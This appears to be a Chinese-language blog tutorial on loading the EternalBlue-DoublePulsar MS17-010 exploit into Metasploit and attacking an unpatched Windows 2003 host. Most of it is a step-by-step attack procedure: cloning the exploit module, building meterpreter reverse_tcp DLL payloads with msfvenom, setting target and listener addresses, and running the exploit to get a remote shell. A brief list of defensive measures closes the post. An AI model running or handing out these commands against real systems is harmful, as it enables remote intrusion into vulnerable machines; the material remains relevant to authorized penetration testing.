移植并利用MS17-010漏洞

MS17-010的漏洞利用模块Metasploit虽然已经集成,但是经过测试后发现不支持渗透Windows 2003系统,但是网络上基本有支持的渗透脚本。起github下载地址为htps://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/。

      首先讲该漏洞利用模块克隆到本地文件夹,接着将eternalblue_doubluepulsar-Metasploit文件下eternalblue_doublepulsar.rb 复制到 /user/share/metasploit-framework/modules/exploits/windows/smb 下。

git clone htps://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

cp -r  deps/  eternalblue_doublepulsar.rb  /user/share/metasploit-framework/modules/exploits/windows/smb

移植并利用MS17-010漏洞_第1张图片

接着,加载msfconsole,然后搜索该脚本,输入use命令加载该模块。

msfconsole

search  eternalblue

use exploit/windows/smb/eternalblue_doublepulsar

移植并利用MS17-010漏洞_第2张图片

移植并利用MS17-010漏洞_第3张图片

将MS17-010漏洞利用代码移植到Metasploit框架后,就可以开始渗透测试了,在攻击前要先生成一个dll文件,如果目标机是32位的系统就生成一个32位的dll,是64位的系统就生成64位的dll。


64位:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f dll -o ~/eternal11.dll

32位:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.100 -f dll -o ~/eternal11.dll


在使用该漏洞模块时,要按照实际情况设置以下参数。

set processinject lsass.exe (intel x86和intel x64位的都可以)

set rhost 192.168.1.150

set lhost 192.168.1.200

set lport 4444(该端口不可修改,否则无法成功)

set  target 9

set winepath /root/.wine/drive_c

set payload windows/meterpreter/reverse_tcp

set targetarchitecture x86

移植并利用MS17-010漏洞_第4张图片

接下来输入exploit或者run命令发动攻击,成功后会顺利得到一个Meterpreter会话。

至此,我们已经成功利用MS17-010漏洞完成入侵。

因为该漏洞危害极大,读者们一定要严格做好防御措施。

  • 为计算机安装最新的安全补丁
  • 及时备份,一定将重要文件离线备份
  • 开启防火墙
  • 关闭445.135.137.139端口,关闭网络共享

你可能感兴趣的:(Metasploit,MS17-010)